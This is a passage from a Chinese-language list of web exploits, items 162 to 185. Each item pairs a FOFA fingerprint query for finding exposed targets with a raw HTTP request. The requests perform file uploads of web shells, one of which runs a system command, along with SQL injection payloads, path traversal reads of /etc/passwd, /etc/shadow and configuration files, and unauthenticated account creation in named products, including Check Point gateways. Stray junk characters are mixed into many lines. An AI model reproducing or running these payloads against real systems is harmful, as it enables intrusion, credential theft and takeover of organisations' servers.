( B0 n N2 d8 n, i<fileName>../../../../dizxdell.aspx</fileName>% r; q0 f5 n) [- B: Q% l( }( z' t
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
$ z: G9 x* w4 t: }<tag>3</tag>
' e' Z& x8 Y; o, \1 Z5 z</UploadResume>$ H: E1 x& m9 r; n/ g
</soap:Body>
" B- y9 r- L9 s; [4 k: b</soap:Envelope>! K5 j6 F( R. B9 l& H8 h9 y
8 V; X& G6 G5 N# q, L% ]6 V& q* J1 n% \; f1 N
http://x.x.x.x/dizxdell.aspx, F/ Y c4 W" f' E
7 K6 G5 c4 f5 i; k% j7 S3 ?162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传
4 M: e6 j, F9 e8 c& XFOFA: app="和丰山海-数字标牌"" `& f& \! x+ u3 X. ], |
POST /QH.aspx HTTP/1.1
( m9 e: D, H: ?% l: N5 LHost: x.x.x.x
" H9 R. M( F/ ?) i! d( jUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0# \5 P* s; }' [
Connection: close
2 M5 [- B d! P9 |# V% bContent-Length: 583% V# z3 ]( A9 b6 j* u
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey6 A5 a' ]' | r4 ]( f1 F. V- \
Accept-Encoding: gzip: `1 `/ y$ S1 {
- K8 ]1 j4 c Y( S
------WebKitFormBoundaryeegvclmyurlotuey
) P$ R7 S- ?: V0 G! c" R) Z6 vContent-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
9 T4 E# r1 C1 ^: r& CContent-Type: application/octet-stream7 q+ D: W1 e) w6 R3 I! e
8 C/ i/ W/ f+ e9 y
<% response.write("ujidwqfuuqjalgkvrpqy") %>
. @ z# ^5 r% o3 D+ C" O( W0 |. [$ O------WebKitFormBoundaryeegvclmyurlotuey
, X! k; l3 o: LContent-Disposition: form-data; name="action"
- q" G9 p( \- P+ [2 \. N' H9 Q
3 ?; t7 i: ^" p4 v5 X4 z0 Jupload' ` a; z5 Q# _1 w+ D) g% }% U0 B
------WebKitFormBoundaryeegvclmyurlotuey
* I" \ _8 h3 @0 U# VContent-Disposition: form-data; name="responderId"
$ m. f. ~) s) Y' J
6 E8 R" B ?8 _2 X yResourceNewResponder0 s& C1 [8 q. D$ S$ s+ q: f- l
------WebKitFormBoundaryeegvclmyurlotuey
5 W& } G4 ?) O+ r6 G! [ k1 \ MContent-Disposition: form-data; name="remotePath"
$ f- j2 M, Y0 Q5 [+ j. q0 ]) M; Z/ z# z% C5 {/ F1 `* l! t0 Q
/opt/resources
, O9 L; D6 Q2 u0 W1 E8 W------WebKitFormBoundaryeegvclmyurlotuey--
. S; P+ u# G8 F! i+ H, K* O- x
5 E+ ~3 H4 ?2 _$ z
2 u: s$ J- X0 Ihttp://x.x.x.x/opt/resources/kjuhitjgk.aspx
9 @0 V$ L K! t& i9 Y' i( Q t) U( ~3 X' b1 P
163. 号卡极团分销管理系统 ue_serve.php 任意文件上传
. }% f; {' ^ a" MFOFA: icon_hash="-795291075"
+ ^* v5 X! z# YPOST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
# Q& N5 z0 F" Q" t4 `: A# zHost: x.x.x.x/ F) ^/ ~7 C) k' z" \! i. B7 q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
. p: Z+ ]% n2 Z) v1 _, n/ v/ SConnection: close
2 V$ C" W, x- E' }! l* b( T/ cContent-Length: 293' f: t9 O* ^# m; k/ q K4 \- p- }
Accept: */*% D0 \ E: L# [7 Z4 g& Z
Accept-Encoding: gzip, deflate A6 A5 O. k: U/ R: L$ J) w ]
Accept-Language: zh-CN,zh;q=0.97 m" G& f: m" D) V R7 d9 L
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod
8 Y7 a' v( u9 `* Q3 }. a+ |
! z/ J9 \% w" x, b6 [/ a7 m------iiqvnofupvhdyrcoqyuujyetjvqgocod
' s7 r# `' Y3 u) x7 r' y, x& YContent-Disposition: form-data; name="name"
) A* d! ?+ B1 B9 W0 s: o, v2 c" d( s" p) }
1.php3 Y. V( T* R, d3 l
------iiqvnofupvhdyrcoqyuujyetjvqgocod
( \/ f' B$ f7 a5 u5 x8 X( jContent-Disposition: form-data; name="upfile"; filename="1.php"
; r5 m4 ~) ]# u% u) XContent-Type: image/jpeg
6 E; `% M* R) e( ^9 y2 [! a+ D; Q" t, }
rvjhvbhwwuooyiioxega$ K, i& w% E( ?: S2 J
------iiqvnofupvhdyrcoqyuujyetjvqgocod--
& s1 }- ^2 Y% `* r
: z6 m9 K3 L+ n7 i: o6 [
& m+ E4 s9 ^; F164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传
; x6 c) j; ^% ~1 q) l6 EFOFA: title="智慧综合管理平台登入"
% U; Y! E* V- O6 Y4 r+ g, VPOST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1* H: |; a( |( q+ s P
Host: x.x.x.x
2 y( k; W" q# l5 K# l, w7 g# gUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.02 ?+ w9 g0 K9 y! v x' V
Content-Length: 288
A9 M% I& X0 K) y& BAccept: application/json, text/javascript, */*; q=0.01/ E4 \! {) s E: F) z, B& b
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,
+ a' p, z4 V1 |8 \! i% qConnection: close$ N o o/ n0 v1 f+ z
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl8 v6 a5 \, a W# q
X-Requested-With: XMLHttpRequest
2 z& V/ [+ Y- Z. }( `% N' XAccept-Encoding: gzip p0 E& E/ u. _# @6 t* S4 g$ c7 p K
4 }3 }1 Q9 Q" z! `( m------dqdaieopnozbkapjacdbdthlvtlyl
( x8 T) Y5 }: P2 [; g) JContent-Disposition: form-data; name="Filedata"; filename="qaz.aspx"' t& c7 j+ \$ G: l* _8 O+ Z5 M
Content-Type: image/jpeg# f" P2 |6 @& B, ?* v0 n, Y) w' x
; o" }! k5 y! l7 s4 J& T
<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
% e8 u: \ z4 t% M1 Y------dqdaieopnozbkapjacdbdthlvtlyl--- O* Z5 I9 ]% }; B1 k6 G( g. g
' p. W; Z( F7 J- i) L
! }. G: c* W0 U% g! s3 V4 ^" w' dhttp://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx x! i5 v' [1 h
* p# @ U1 l# I& D" ?+ ]
165. OrangeHRM 3.3.3 SQL 注入9 h! s" [7 a$ {; V }+ k+ M
CVE-2024-36428
& ^* o1 L- a% F5 h0 a* q. PFOFA: app="OrangeHRM-产品"1 z' ~7 w& O% C) ]. U% n# Z4 h/ G
URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))
1 k' B+ A' C( x4 V2 C( q2 ^# J: D. d" V4 g; |: W# P7 G' p
# b5 M0 U$ n7 {4 l
166. 中成科信票务管理平台SeatMapHandler SQL注入
/ d" }6 X3 X5 y' V$ cFOFA:body="技术支持:北京中成科信科技发展有限公司"" {- W( g; B7 i
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1( t( G, x- }1 e/ V r' ~1 X% H
Host:
" E) s" x- m, H2 [" |: t# UPragma: no-cache
9 f9 w9 [5 X& k1 g: C' ZCache-Control: no-cache$ D: g8 z2 ]9 {) D& T$ \
Upgrade-Insecure-Requests: 12 @5 q5 M/ z/ i( C) t: L# X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
- Z( F4 p" L7 M& g% p6 w4 |Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.76 M& c. T1 G/ F( V0 Q* L2 F+ c
Accept-Encoding: gzip, deflate1 r, P& d. u& z! b( Z' ^
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8" k: p9 i% v, _ h! I0 V3 [
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE) o# ^. W" l3 o4 m! F6 i& O, v- H
Connection: close. r0 o9 M( p' w
Content-Type: application/x-www-form-urlencoded7 z: R1 x: ]$ j; N4 y- y8 l% U. I
Content-Length: 897 e/ j( u2 m3 `0 S! x
* \2 w% s. N$ M* q& H0 BMethod=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE- \/ x* n5 }* k9 [' _
7 q9 a) e# K; G" y5 G9 ?
[9 D+ \* y. K" z3 A6 V$ n' G167. 精益价值管理系统 DownLoad.aspx任意文件读取0 t- [: N' E3 ~5 b+ I6 ~
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
% b0 Y/ b2 _3 x/ z G, ?GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
5 B! q1 o5 c' I' tHost:
( b. \4 z8 C6 Q7 lUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36- f: @& G# X% y2 Q- B8 O6 F
Content-Type: application/x-www-form-urlencoded$ g, N2 K$ R$ R, e& d7 z
Accept-Encoding: gzip, deflate
3 H" }) I. p% t$ _; o1 OAccept: */*& ^4 x/ E# n, z" b; J, r6 B1 V$ Z) G
Connection: keep-alive
1 F c$ \, `) @, @0 C
: u# C( m8 J) s5 ?; |: a' W0 Y- H- Q5 j4 H$ Q# W2 M5 b& o: t
168. 宏景EHR OutputCode 任意文件读取" t; }8 H0 R# y8 T& t+ `0 t) X
FOFA:app="HJSOFT-HCM"
) I7 G# \# e, V, t$ gGET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1% {) n0 o: u; U/ h3 U* q( ]5 r8 m/ t
Host: your-ip
. R* T, L5 h2 D) A, X2 J( g7 LUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.364 ]" @# ?- K" f B, Q5 T
Content-Type: application/x-www-form-urlencoded5 b1 v2 O" i+ Y$ o! G
Connection: close
4 |/ Y5 M8 J. g! d7 ~' U3 `0 ]
5 n( c; `2 R6 v O6 z' c0 T, U& r4 ~& v. I W% W: S' ~: E
/ x% a, E& K, p) \1 ]0 ^169. 宏景EHR downlawbase SQL注入
! k% ?) m' O* B5 p" s5 N; J' H* n0 |FOFA:app="HJSOFT-HCM") o+ C7 I; A& b7 o8 P$ T9 S; X
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.14 s$ n2 }* n) `! T! ~$ ~
Host: your-ip
. L# E* R% Z5 k" IUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36# Z% U: W5 [; }+ N9 z: V0 l. O
Accept: */*6 ]: Q) B! m/ h: i" f& L
Accept-Encoding: gzip, deflate0 o& b y# E3 \4 n5 G$ H) u1 X
Connection: close# |" Z% n: F4 `
# K! n% N4 v5 i! b P$ b( O
/ a1 D9 O: h7 u# D$ D- M1 e8 @2 ~6 k Z, i! Y
170. 宏景EHR DisplayExcelCustomReport 任意文件读取
" P0 q. D% Y2 k8 c# oFOFA:body="/general/sys/hjaxmanage.js"
# x) M8 e$ u& q% R6 I4 JPOST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.11 }/ t1 k( R% _
Host: balalanengliang/ ~, B" t1 \8 G4 R2 @
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
, Y/ m3 x' \+ D! `& ^/ B' {7 l3 ]# OContent-Type: application/x-www-form-urlencoded$ ~ `& w- B2 }/ ^7 N
: T% [$ M9 f& r0 d1 B
filename=../webapps/ROOT/WEB-INF/web.xml
, x; ^; D# E# d& j- q
& `& O! L: B) [# G# h9 t `5 K: ^- L+ v2 l
171. 通天星CMSV6车载定位监控平台 SQL注入2 k' S- u. h7 m6 J) g
FOFA:body="/808gps/"
c8 i3 u1 n5 d3 ^2 X0 p0 LGET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
5 X* C0 W, q% v5 N3 g+ z* V3 W5 cHost: your-ip
8 U0 t* i; T% C* W4 F# `% ]User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0& m" E0 Z0 V; \3 |2 n) f# b
Accept: */*
" Q" t6 S! w4 c$ KAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
6 m, O: _1 d5 H6 P( WAccept-Encoding: gzip, deflate
8 }! j. f' W3 P: I& i& b2 U8 UConnection: close
! g* D# M" l/ M: g# Y8 c3 _* f+ E. k2 @
& k K7 ^* K3 ?9 j' N# }( R) a3 X; y/ o0 h; u: a1 G n; b
172. DT-高清车牌识别摄像机任意文件读取* t. }7 ^# [; z2 i* J+ }
FOFA:app="DT-高清车牌识别摄像机"% q9 R' Y+ ^" }, P8 G3 f
GET /../../../../etc/passwd HTTP/1.1: e" v' u ]$ S& L5 U! |
Host: your-ip
9 I0 G5 Q. W1 q8 k! a4 nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.360 r5 P; D3 h: O' M7 p5 d$ f
Accept-Encoding: gzip, deflate" n6 ~1 @& f7 M1 d$ f- L
Accept: */*" F) L' H* f Y+ w( c: X
Connection: keep-alive& V6 j6 ?1 X2 o: k! u! V
8 H& I% q0 {! ?8 U! c4 i8 t
% t4 g, M5 c. ]; ]2 N/ `
4 B4 v, z3 ]3 T: F173. Check Point 安全网关任意文件读取
1 T# ~& d" u6 t+ pCVE-2024-24919+ A6 |& f8 D( g$ {; Z/ @( P
FOFA:app="Check_Point-SSL-Network-Extender"8 R/ x) O' {) w3 F, j$ C6 [1 M
POST /clients/MyCRL HTTP/1.17 b0 t8 r4 ~, d9 R8 d
Host: your-ip
s5 ~2 R- q6 L5 tContent-Type: application/x-www-form-urlencoded
0 |/ c/ B! N( L: \: Q( n4 y. a- @8 Q- `7 m
aCSHELL/../../../../../../../etc/shadow
5 w4 P& w3 e3 C4 h1 H7 C
+ j& _; e2 D2 b$ } A5 C) V! } U+ |
: H/ \* ~: a4 G! X D! v174. 金和OA C6 FileDownLoad.aspx 任意文件读取
4 |# b8 m2 m/ @$ X7 `FOFA:app="金和网络-金和OA"
6 S/ T6 C5 u3 ^' D k5 |GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
: a I- A# K" p8 v7 lHost: your-ip" ?( G, P; [* I) S4 Y- @+ L& E; v
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.364 G1 }7 x* z# x
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
8 {, ?6 U/ [- [1 V1 y, gAccept-Encoding: gzip, deflate, br9 \+ e( W3 H' l+ ]& ` n
Accept-Language: zh-CN,zh;q=0.9
" r! C; S# W& X8 F( @, f8 b0 H: qConnection: close
! B0 L) ~9 ?7 [/ g+ q. u
4 j$ [! P y0 ?
$ d7 V" s& M/ e1 `. _
: w) W. ~( F' ]! {, ^( g. Y1 n$ k ^- i175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入
R( G: {- v. pFOFA:app="金和网络-金和OA"% d% _5 I( z5 ?) V d# q
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1# r# r1 S. U( H" D5 w# ~
Host:
) C! k7 o5 ]2 L% [, g& u0 _User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
1 E- e6 x; j$ }1 V: @Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8/ O) {6 G5 s; l# ?( V
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
6 b E+ Y! K$ c1 P; h+ oAccept-Encoding: gzip, deflate4 Z$ H" G' ^2 c( f/ i) i4 y
Connection: close
- ^. A$ [4 Q1 i+ pUpgrade-Insecure-Requests: 14 K1 d8 Y; u2 [0 f
/ Y3 P' _( @1 _. Z x; c$ X L7 ^/ z
176. 电信网关配置管理系统 rewrite.php 文件上传
. W+ ^2 \9 H$ `7 UFOFA:body="img/login_bg3.png" && body="系统登录"" a& Y& b4 ~ k$ p; K
POST /manager/teletext/material/rewrite.php HTTP/1.19 w+ z n6 [# p6 r* W% d
Host: your-ip
% F2 \6 ?( Z: ]3 GUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.06 {- S# r% Q" Q6 e1 ?1 F# e! O
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
* O; ]+ b7 }, A" ^' Y' h! }3 hConnection: close
2 p$ `0 n/ f7 j1 ^/ J4 D
& ]+ ~0 C4 i( O. v8 G3 }, t( v------WebKitFormBoundaryOKldnDPT
: j- ^. r' Y1 R* r8 ^% mContent-Disposition: form-data; name="tmp_name"; filename="test.php"
! m" @5 F! q! [+ u, [Content-Type: image/png
: J" ~- j8 [- N- s5 o 3 ^' b! k) k1 w" o' G! J
<?php system("cat /etc/passwd");unlink(__FILE__);?>
8 ]9 X7 g& T S5 l ?+ F+ |, l" k------WebKitFormBoundaryOKldnDPT
5 \1 q Q% k* @0 cContent-Disposition: form-data; name="uploadtime". I4 n. V, {" v! \% j Y T, T0 u
* A: g$ y: D& }5 Y5 a , L7 G. K& {! w# T
------WebKitFormBoundaryOKldnDPT--
; ?" L! W# \2 q- V
+ U9 l% U Q4 l. ]& f
5 w& H; p( U! t2 ^) Y% u1 C* {8 l3 H* Z5 Q
177. H3C路由器敏感信息泄露
9 o* B! v1 g& A/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg3 X7 v! U7 G/ t. u$ o# V: I& {0 ^
/userLogin.asp/../actionpolicy_status/../M60.cfg9 L7 g9 m1 Z/ ?8 i2 z% G5 W
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
2 }& {9 o6 m! m# J l- a2 b/userLogin.asp/../actionpolicy_status/../GR5200.cfg6 c! Q1 b9 I# f/ W, q9 K8 x
/userLogin.asp/../actionpolicy_status/../GR3200.cfg D2 _( R' w7 N! S; @ }
/userLogin.asp/../actionpolicy_status/../GR2200.cfg$ s/ z* h% R$ k8 q
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg3 r: K! ?/ [( J M
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg7 L8 W9 B J; i
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
1 m! @ o/ y9 n/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg. b' p! r/ o6 z7 S
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
4 c/ |" m7 C4 g* ^/userLogin.asp/../actionpolicy_status/../ER5100.cfg
6 e w2 w" K0 o" a6 [/ _- h/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg4 _% J% ]+ a2 N+ `
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
9 N$ A' @+ \* [! E- Z3 V/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
, T: z. y1 F, Z# I" O! @/userLogin.asp/../actionpolicy_status/../ER3200.cfg& j1 J o, G. Z
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg) Y) r u6 A& |. Q9 k3 g
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
4 V M" \4 A5 f/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg6 a; J+ Z2 B. ?- r6 q
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
0 e5 J# g3 @ o& E# d% ^2 F3 g/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg! M3 I5 t1 N" W7 R5 v7 X
; |# i/ F7 }9 v+ h
6 m* l% z, s* V6 K$ a178. H3C校园网自助服务系统-flexfileupload-任意文件上传
6 F C; j1 G. ~' k4 g& T0 pFOFA:header="/selfservice"
( N% z, o: B: I3 D% w5 dPOST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1$ u3 E# O: d: [: G" J+ l9 F
Host:
3 R8 J4 X2 f, M' sUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 k0 f; ^2 c8 o5 B+ Z0 v% Q) V
Content-Length: 252
5 d4 K4 t/ R9 [" X/ R1 `Accept-Encoding: gzip, deflate
: l% B6 e6 p* Z% yConnection: close
% Y# L9 h0 ?% w6 H8 a) W: qContent-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l3 T1 s2 ]+ N% M0 ^1 m7 m
-----------------aqutkea7vvanpqy3rh2l$ _6 H* M: H, v0 r% P
Content-Disposition: form-data; name="12234.txt"; filename="12234"
+ x" f. S! B. ?Content-Type: application/octet-stream
, \3 l. J; r' A. D) JContent-Length: 255
2 v* r/ I+ S: z) ^" v- ?* C$ z
) @( [$ v4 \7 n12234# M4 S6 ]$ @" O! D9 I9 ?
-----------------aqutkea7vvanpqy3rh2l--7 ~0 F, g2 s9 f- k0 L" g; W$ J; I9 a
5 e& U# L3 n4 @% ^
) I+ Z. {$ i) P; p- KGET /imc/primepush/%2e%2e/flex/12234.txt
- b- e# D1 J* C% A2 E& g8 `5 c8 F, W8 @! Z
* Z k P1 \3 X
179. 建文工程管理系统存在任意文件读取! P8 W! }* X, r2 R, c4 X
POST /Common/DownLoad2.aspx HTTP/1.1
- A4 g5 v2 s# C2 ~& _, C$ p: ] GHost: {{Hostname}}- c& r; ^- h- {4 U* z" q" X
Content-Type: application/x-www-form-urlencoded
9 H8 v9 C1 ~2 K2 D3 f7 N$ _5 d4 X wUser-Agent: Mozilla/5.0
/ ?" [' s8 g, C
+ u" j2 o% s) o0 ppath=../log4net.config&Name=% ^* |+ g1 b% `8 Y, N; G
! b- Z, [+ y6 \, z1 |
6 a: |6 h# S. G% E- `% e( n180. 帮管客 CRM jiliyu SQL注入
4 Z; V; O$ {2 G* C' gFOFA:app="帮管客-CRM"9 w: [% r0 h9 s( _
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.13 H' C; J/ @, ?! d4 m
Host: your-ip
: ~1 i' s3 e: r# J+ P7 SUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
2 u* |+ y" S$ Q1 y. U/ L, QAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
; N, u# `* ?: A3 Q7 j2 `2 J$ YAccept-Encoding: gzip, deflate' F/ L7 O8 M9 F D( E
Accept-Language: zh-CN,zh;q=0.9% c+ z% o( R9 {
Connection: close
4 W& c N0 q' d) _! S4 D, p1 b2 E: R; C$ r; J. g2 m% z; K/ r( k
) [3 u7 c* o- U3 o A- L181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入
# D! \4 A/ J3 ^1 yFOFA:"PDCA/js/_publicCom.js"
2 Y! g* b1 {$ K1 ?! cPOST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.11 ~. A& x) D" P8 {* k
Host: your-ip
+ j8 v# H4 ^# Y s* S! R% ^User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36( V ^3 e+ Y. r9 H7 E3 b9 l
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
0 @+ ~7 ]5 q3 v3 {" M8 HAccept-Encoding: gzip, deflate, br
9 c% R7 o) `* b! ]/ h7 \Accept-Language: zh-CN,zh;q=0.9
0 ` a6 F( p- M# P' oConnection: close
$ s& E% q5 b1 o' o9 D, sContent-Type: application/x-www-form-urlencoded0 H+ ~- L7 y) c& _2 ~
7 T2 q2 Z* ~" J9 `7 b, N6 Y. X/ A. B. y4 e2 ^- H
action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20% W! f7 J6 S+ J) [! P
) c+ F' V, p" d, H4 s+ @6 R
. \0 ^" q( [+ W6 b
182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建 }1 ]6 {. Z4 U0 T3 D' X* i% W; ~
FOFA:"PDCA/js/_publicCom.js"$ k1 k7 f4 ?. h" T. s
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
, [7 b6 E4 \$ \Host: your-ip
2 e6 o9 n9 C# H# m: R/ lUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.362 t4 T+ v# y% i6 `
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.77 a' V7 z3 k/ j5 k- O1 y2 t
Accept-Encoding: gzip, deflate, br
& n; ` X/ e. ~* N8 zAccept-Language: zh-CN,zh;q=0.9
% t0 n Z+ b6 d6 d/ O/ R* TConnection: close* W/ Z- @9 }/ G1 v, n a& [% F$ D7 N
Content-Type: application/x-www-form-urlencoded
- O) g& n9 O5 W R8 D
R5 A* c9 ~9 S% @1 }2 W7 T6 r$ e# ?" a- R" z
username=test1234&pwd=test1234&savedays=19 i0 ^* s3 P% p
; }# `% X( B$ n* ?0 A& b
- f9 `$ k( L3 _9 u7 ^$ H8 D183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入: ~7 ~1 ^! S# Q- Z- O
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"9 g- O- p' J% O! g# k9 X7 d# Y
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
4 R' y1 w% ~5 U3 ^Host: your-ip$ x' M8 A2 K [" A" {- K& d
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36& `& Q( \9 L+ ?; ], k3 s2 \" o+ T. u
Accept-Charset: utf-8
6 [" \, k; O1 s* CAccept-Encoding: gzip, deflate0 W% }7 f' w7 [. V* G; Y
Connection: close
* j% R: t4 @ ]" ^- E
Q. {! ?+ z6 M! U4 r0 ~7 i. F C7 C: G6 l% q( j& {% b
184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加9 }% t7 d5 F. S9 m2 @) R" S) t; k
FOFA:server="SunFull-Webs"
8 f/ z7 I: v5 VPOST /soap/AddUser HTTP/1.1
8 ~+ z0 v/ h( I; B: IHost: your-ip
0 k( l. l1 O; u' H& h3 _' [3 d4 m& PAccept-Encoding: gzip, deflate
8 R# k' T; H! H! N# s2 f6 wUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
6 a# S& k9 n0 N- Y0 |Accept: application/xml, text/xml, */*; q=0.01
2 {# g' K$ s3 d( t; U2 ~$ M6 cContent-Type: text/xml; charset=utf-8$ g: u$ i: @# a1 [, S
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.21 Q3 D3 `) r1 W7 ?1 y
X-Requested-With: XMLHttpRequest" V9 `; U6 w* X1 s
3 Z7 o- z# B& S3 |% a0 _5 t3 F$ [) }" ^# s- j) U; @
insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')
% l" P" B7 N8 g$ t
: M1 D# b0 N, [: D9 a$ \/ @$ D0 G1 s
185. 瑞友天翼应用虚拟化系统SQL注入
